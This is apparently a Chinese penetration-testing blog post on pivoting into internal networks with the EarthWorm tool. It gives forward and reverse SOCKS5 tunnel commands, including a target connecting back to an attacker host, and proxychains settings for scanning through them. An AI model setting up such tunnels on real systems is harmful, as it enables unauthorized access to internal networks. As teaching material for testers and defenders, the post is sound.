ew使用方法

详见博客,写的很好。这里重点说下文章中的场景一:把流量代理到攻击机,进行内网信息收集。

1.正向代理方式

目标机有公网IP(219.x.x.x),且可任意开监听端口(即开启的监听端口可在公网访问),可以使用正向的方式代理流量。在目标机上启动socks5服务并监听1080端口:

./ew -s ssocksd -l 1080

在这里插入图片描述

接着流量代理到219.x.x.x的1080端口,就相当于把流量代理到目标机了,就可以使用相关工具做进一步渗透。
攻击机kali上proxychains代理配置:

vi /etc/proxychains.conf
[ProxyList]
socks5    219.x.x.x    1080

然后就可以愉快的进行内网渗透了。
在这里插入图片描述

2.反向代理方式

1.由于目标机没有公网IP,但是能访问公网。因为目标机没有具体地址,无法使用正向连接,可使用反弹连接的方式代理流量。在攻击机本地启动流量转发,将来自外部1080端口的流量转发到本地8888端口,并等待目标反弹连接:

./ew_for_linux -s rcsocks -l 1080 -e 8888

在这里插入图片描述
2.在目标机上启动socks5服务,并反弹到攻击机的8888端口:

./ew -s rssocks -d 123.x.x.x -e 8888

在这里插入图片描述
3.代理通道架设完毕,访问攻击机的1080相当于访问目标机的8888端口,在攻击机上使用proxychain将流量代理到本地1080端口,相当于把流量代理到目标机上了,在攻击机上发起请求相当于在目标机上发起请求,然后可以使用相关工具做进一步渗透。
攻击机上proxychains代理配置:

[ProxyList]
socks5    127.0.0.1    1080

4.接下来可以愉快的用kali进行内网的渗透了。
在这里插入图片描述
注意:
1.由于proxychains无法代理icmp的数据包,要加上禁ping参数-Pn(不检测主机是否存活,直接进行端口tcp扫描)
2.如果攻击机不是公网的VPS kali,而是使用本地的主机,公网VPN作为中转,则在本地windows主机中使用windows代理工具,如Proxifier。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值